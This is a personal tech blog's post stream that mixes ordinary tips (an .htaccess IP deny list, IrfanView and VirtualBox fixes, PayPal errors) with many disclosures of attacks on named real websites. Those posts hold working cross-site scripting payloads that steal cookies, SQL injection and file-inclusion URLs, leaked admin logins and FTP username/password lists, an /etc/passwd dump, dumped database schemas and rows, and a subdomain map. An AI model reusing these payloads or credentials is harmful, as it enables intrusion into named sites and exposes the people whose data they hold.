pro(re)gress

download the manual - you can guess what is the password

After receiving tons of spam on a few websites I've decided to ban the whole apnic addresses Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage. How to ban chinese spammers. P.S. I've added a few LACNIC (last update 2012-11-16) Download here the file or just add the content in a .htaccess file and the spam from the Asia should be gone. Put the .htaccess in the main (or any other) folder of your website. You can use the same approach to ban any other ipv4 address space. __________.htaccess____________ #list retrieved from #http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt #Banning APNIC deny from 1.0.0.0/8 deny from 14.0.0.0/8 deny from 27.0.0.0/8 deny from 36.0.0.0/8 deny from 39.0.0.0/8 deny from 42.0.0.0/8 deny from 43.0.0.0/8 deny from 49.0.0.0/8 deny from 58.0.0.0/8 deny from 59.0.0.0/8 deny from 60.0.0.0/8 deny from 61.0.0.0/8 deny from 101.0.0.0/8 deny f

While using the batch processing of Irfanview you can encounter this error: "disk is full". The error happens when you've set to overwrite thre previous files (advanced conversion settings) and they are *locked*. Check if the file can be written by your Windows User, check that the file is not read only, check if the file is not locked by another process. ______________________Remove read only____________________ Right-click on the file. Click on Properties. Click on General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders. ___________________________________

It could happen that you cannot find the drivers ( AMD PCNET Family PCI Ethernet Adapter - not installed) of the ethernet (nic) adapter that is used in  virtualbox .  PCI\VEN_1022&DEV_2000&SUBSYS_20001022&REV_40\3&267A616A&0&18 I've found also this link https://www.virtualbox.org/ticket/3411 but I was unable to see a working download. Since the links to the amd websites are failing and it seems that they canno be found website I'm adding a new link. Here you can download the  Drivers AMD PCNET for Virtualbox They have been tested with Windows XP 32bit  and Virtualbox 4.2.0 r80737 . After a bit of time I've tested them with Windows 7 pro 32bit (a slim version) and they work. They also work on Windows 2003 R2 (thanks to David Acosta). If you have a direct link to the AMD website or any other good information just add it in the comments.

http://www.hstl.crhst.cnrs.fr/i-corpus/histmap/informations/bollettino.php?lang=en%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E%3C%22

SQL Injection http://www.vanthuanobservatory.org/bollettini-dsc/bollettino.php?lang=en

sample page http://www.mnitalia.com/home/index.php?page=page.php&cat=webmarketing http://www.mnitalia.com/home/index.php?page={file inclusion here}&cat=*

POST http://www.primomaggio.com/newsletter.php POSTDATA nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1 _____ An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

http://infopoint.atac.roma.it/bw.asp?lingua=ita%22%3E%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E%3Cscript%20src=%22

http://www.micron.com/search?q=%3Cscript%3Ealert%28document.cookie%29%3b%3C%2fscript%3E

 Paypal PDT/IPN - HTTP status Error 302 happens when you are contacting paypal via http while (as far as I can understand) they have enforced the requests to be via SSL (443 https)  and not in simple http requests (80 http). It happens in sandbox and live.

The Paypal error 4003 (when receiving PDT) could happen the server is doing too many requests/validations for the same "tx" (transaction id) with a cmd=_notify-synch. Paypal will not send back the data after about 5 requests. Sometimes the error could happen randomly in sandbox. This shouldn't happen in "live".

merchant_return_link=click+here merchant_return_link=return+to+merchant merchant_return_link=* it could happen if: the client browser is clicking the button while not accepting/using/respecting the META tag redirection the autoreturn is set to off in the the merchant account an url rewriting could be a solution

http://www.ior.it/RegMed/Web/Login.aspx user: RegMed  pass: pippero user: admin pass: colon  -------------------------------- It's possible  to change the password of any user by knowing only the username (????).

Since the website has been closed (I'm sorry for that). Some (old) informations. ***Remember that I've never abused of any website or modified anything or used confidential data.*** http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query /inc_ricerca.htm, line 12 -------------- http://antiproibizionisti.it/archivio_sdf.asp?f=1'0 http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9 http://antiproibizionisti.it/archivio_gessa.asp?f='9 http://antiproibizionisti.it/display.asp?f=4177&u=10 http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','',

Too much data to dump. Anyway I've deleted everything (here ... ). --- samples --- company_address (   company_id bigint(3) NOT NULL auto_increment,   company_name varchar(200) NOT NULL default '',   address longtext,   street_id bigint(3) default NULL,   city_id bigint(3) default NULL,   state_id bigint(3) default NULL,   zip varchar(20) default NULL,   phone varchar(20) NOT NULL default '0',   fax varchar(20) default NULL,   email varchar(100) default NULL,   category char(1) NOT NULL default '',   PRIMARY KEY  (company_id) INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0"); ------------------------------------------

I've found this data time ago... CREATE TABLE partners (   id int(11) NOT NULL auto_increment,   email varchar(255) NOT NULL default '',   phone varchar(50) default NULL,   fax varchar(50) default NULL,   address varchar(255) default NULL,   zip varchar(20) default NULL,   city varchar(50) default NULL,   state varchar(50) default NULL,   country varchar(50) default NULL,   first_name varchar(100) default NULL,   last_name varchar(100) default NULL,   company_name varchar(100) default NULL,   login varchar(25) NOT NULL default '',   password varchar(25) NOT NULL default '',   additional_data text,   ku_balance float(16,2) unsigned NOT NULL default '0.00',   us_balance float(16,2) unsigned NOT NULL default '0.00',   credit_limit float(10,2) default '0.00',   status enum('unconfirmed','active','suspended','free') default 'unconfirmed',   promo varchar(100) default NULL,   pa

the website is dead so ... I can publish something The main table nurseryinfo (    Title text,    Initial text,    First_Name text,    Surname text,    Contact_Name text,    Position text,    Nursery text,    Address text,    Address1 text,    Town text,    County text,    Postcode text,    Tel_No text,    No_0_2 text,    Range text,    Weekly text,    Tot_Staff text,    Group_No text,    Facility text,    Member_No text,    Branch text,    Region text,    Officer_Br text,    Officer_Re text,    Officer_Ex text,    Year_Joined text,    Eig text,    Contact text,    Task_Group text,    _998 text,    No_of_Nurs text,    So text,    Fax_No text,    Renewed text,    Bulletin text,    E_Mail text,    Mem_Type text,    Fees_Paid text,    Paid text,    Month_Join text,    Membership text,    NDNA text,    Chair text,    Regional_R text,    Chairtel_N text,    Rep_Tel_No text,    Ass text,    Primary_ text,    Add_site text,    Head_offic t

Since the injection have been fixed time ago ... I just publish some samples (nothing confidential) Sample error [TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1 /ita/web/index.asp, line 15 db: Sql39909_2 sample table -> clienti columns -> cliente, indirizzo, data, telefono sample injection http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa

ns.unisannio.it mail.unisannio.it www.unisannio.it ftp.unisannio.it nosferatu.unisannio.it medusa.unisannio.it hydra.ing.unisannio.it proxy.unisannio.it webmail.unisannio.it gw-0.unisannio.it wwwsci.unisannio.it wwwlavoro.unisannio.it wwwdases.unisannio.it wwwdsga.unisannio.it wwwdsba.unisannio.it wwwstat.unisannio.it wwwsea.unisannio.it wwwding.unisannio.it web.ing.unisannio.it virgilio.ing.unisannio.it wheel.ing.unisannio.it caudina.ing.unisannio.it serg.ing.unisannio.it russo.ing.unisannio.it contabile.ing.unisannio.it opac.ing.unisannio.it sgr.ing.unisannio.it serglink.ing.unisannio.it ponza.ing.unisannio.it deal.ing.unisannio.it gvp.ing.unisannio.it contabile.ing.unisannio.it canfora.ing.unisannio.it paradise.ing.unisannio.it lisus1.ing.unisannio.it lisus2.ing.unisannio.it lisus3.ing.unisannio.it leus.ing.unisannio.it leus-ws1.ing.unisannio.it leus-ws2.ing.unisannio.it lesim1.ing.unisannio.it lesim2.ing.unisannio.it lesim3.ing.unisannio.it

----ftp.tripod.it---- ftp.tripod.it:21  U: angelo  P: angelo ftp.tripod.it:21  U: apostolo  P: apostolo ftp.tripod.it:21  U: arny  P: arny ftp.tripod.it:21  U: basa  P: basa ftp.tripod.it:21  U: bedford  P: bedford ftp.tripod.it:21  U: bonnin  P: bonnin ftp.tripod.it:21  U: bubak  P: bubak ftp.tripod.it:21  U: bucky  P: bucky ftp.tripod.it:21  U: carlton  P: carlton ftp.tripod.it:21  U: cora  P: cora ftp.tripod.it:21  U: cozzi  P: cozzi ftp.tripod.it:21  U: derby  P: derby ftp.tripod.it:21  U: elin  P: elin ftp.tripod.it:21  U: emr  P: emr ftp.tripod.it:21  U: evelina  P: evelina ftp.tripod.it:21  U: evita  P: evita ftp.tripod.it:21  U: fania  P: fania ftp.tripod.it:21  U: fara  P: fara ftp.tripod.it:21  U: federico  P: federico ftp.tripod.it:21  U: ferdy  P: ferdy ftp.tripod.it:21  U: fisher  P: fisher ftp.tripod.it:21  U: francine  P: francine ftp.tripod.it:21  U: gareth  P: gareth ftp.tripod.it:21  U: gonzalez  P: gonzalez ftp.tripod.it:21  U: gussy  P: guss

www.dmyouhak.com:21  U/P: ynws www.dmyouhak.com:21  U/P: daeil24 --------------------------------------- -------shell4.unixshells.de------- root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:operator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: ftp:x:14:50:FTP User:/var/ftp: nobody:x:99:99:Nobody:/: apache:x:48:48:Apache:/var/www:/bin/false rpc:x:32:32:Portmapper RPC user:/:/bin/false mailnull:x:47:47::/var/spool/mqueue:/dev/null xerox:x:500:500:xerox:/home/xerox:/bin/bash kwmo37:x:501:100::/home/kwmo37:/bin/bash sopl69:x:502:100::/home/sopl69:/bin/bash schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash pr0t

http://servizi.pdl.it/cartoline/adesioni/segnala.php just <script>alert(document.cookie);</script> in the form

-Data leak- http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler= we can see the full path within the errors -> C:\Inetpub\wwwroot\yordambt ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script There are some shared folders without password on other boxes ------ The scripts available from the web

this xss is locked by the webserver www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0 this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one. http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12 The problem is within "Search Engine Builder 2010"

(they are not working anymore - check webcaches) www.ovosodo.net xss in the requests (simple) Sql injection (there's no need to write the injection string ... it's very simple) http://www.ovosodo.net/area_clienti.asp after *login* it's possible to upload anything that will be available in http://www.ovosodo.net/images/upload/originali/